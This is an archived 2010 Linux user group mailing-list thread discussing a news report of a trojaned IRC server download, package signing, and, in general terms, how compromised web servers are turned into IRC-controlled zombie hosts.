[ Date Index ] [ Thread Index ] [ <= Previous by date / thread ] [ Next by date / thread => ]
On Mon, 14 Jun 2010, Rob Beard wrote:
On 14/06/10 11:34, Roland Tarver wrote:http://www.pcworld.com/businesscenter/article/198686/linux_trojan_raises_malware_concerns.html Best wishes roly :-)As they mention here, the .tar.gz file wasn't signed with a PGP key (is it possible to sign .tar.gz files?).
You can sign anything - it's just a fancy checksum at the end of the day.
I guess it proves that you have to be weary about what you download from external sites. I guess even getting stuff from say the Ubuntu PPA archives could still leave you at risk if someone packaged something nasty up as part of a program.It's possibly not as bad as some of the security flaws of Windows but still not good, at least for those folks running that particular IRC server.
Fortunately, the application that was compromised does the right thing and doesn't need to be root to run - however there's still a lot of damage that you can do without being root - possibly not to the local machine (which often isn't the aim of the perpetrators), but to be used as remote "zombies" to send spam, launch DOS attacks, do remote ssh probes, and so on.
I've recovered a few packages that do this sort of thing off my (customer) servers - they're packages injected into the server via web vulnerabilities (e.g. bulletin boards with sloppy coding installed by a naive client who didn't bother to read the security warnings), and just run away in the background waiting for a command - ironically a lot of them pose as an IRC client, logging onto varous IRC servers and getting commands via IRC...
The injection technique is often very clever - you get the ability to run a basic command, then they use that to wget the source code, compile it and run it... It all runs as 'www-data' (the apache web server user), then just ticks away...
There are lots of these type of things out there in the wild - I guess the journos just haven't gotten round to giving them the red-top treatement yet.
Given the resources I could do inbound filtering/front-ending of the servers, and there is a lot of software and hardware to do just this, and some places do, but I don't seem to have posh enough clients who care enough to pay for it. (Some will argue that everyone who hosts sites ought to offer it as standard, but ...)
Gordon -- The Mailing List for the Devon & Cornwall LUG http://mailman.dclug.org.uk/listinfo/list FAQ: http://www.dcglug.org.uk/linux_adm/list-faq.html